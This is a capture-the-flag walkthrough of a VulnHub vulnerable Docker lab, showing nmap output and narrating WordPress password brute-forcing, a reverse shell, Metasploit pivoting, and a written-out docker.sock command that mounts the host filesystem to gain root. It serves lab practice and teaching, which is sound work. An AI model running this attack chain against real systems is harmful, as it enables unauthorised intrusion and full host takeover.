Hey everyone hope you your doing good , this is a walk through for vulnhub’s vulnerable docker machine which can be found here. This machine consists of two modes easy and hard , in this post I will be only showing you how I solved the hard one , if you have
NMAP
nmap -p- -sC -sV 192.168.1.7Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 22:24 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.15
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
PORT 8000 (HTTP)
We can see this is a wordpress site so let’s run wpscan on the site
wpscan found a user name bob we can now try brute forcing the password
Login with the credentials found
Now we can either manually upload a php reverse shell or use metasploit exploit
We didn’t get a proper meterpreter shell because of web shell exploit we used so we need to generate linux payload , upload and execute on the target machine
Open another meterpreter window and configure the listener
Now commands can be run properly
Use metasploit’s autoroute to do pivoting
Now we need to find what’s running on docker conatiner so we can use metasploit’s auxiliary/scanner/portscan/tcp module
In order to access the ports we found we need to use proxychains for that we run socks module on metasploit and use proxyfroxy to configure proxy for browser
Verify that the port is added in the /etc/porxychains.conf
We can find docker.sock on the container which means we can create another container having host machien file system mounted on it
But to upload a static binary on that container there is no utility to download a file but we do have internet avaiable on the machine so we can download docker as well but before that I downloaded python3 on the container so I could get a stabilized shell
Run apt update and then apt install python3
Download static binary and transfer it to target machine
Since we have docker.sock on our container we can list the imgaes being used
./docker -H unix:///var/run/docker.sock images
Now to mount the host file system on the container
./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host
Add your generated ssh public key in authorized_keys and then ssh on the box as root
